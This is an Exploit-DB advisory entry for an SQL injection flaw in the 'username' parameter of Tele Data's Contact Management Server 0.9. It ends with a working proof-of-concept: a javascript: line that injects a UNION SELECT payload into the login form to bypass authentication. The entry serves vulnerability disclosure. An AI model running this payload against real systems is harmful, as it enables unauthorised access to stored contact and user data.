Tele Data's Contact Management Server 0.9 - 'username' Parameter SQL Injection Vulnerability

2010-04-28T00:00:00
ID EDB-ID:33909
Type exploitdb
Reporter John Leitch
Modified 2010-04-28T00:00:00

Description

Tele Data's Contact Management Server 0.9 'username' Parameter SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/39799/info

The Tele Data's Contact Management Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database

Tele Data's Contact Management Server 0.9 is vulnerable; other versions may also be affected. 

The following proof-of-concept code is available:

javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();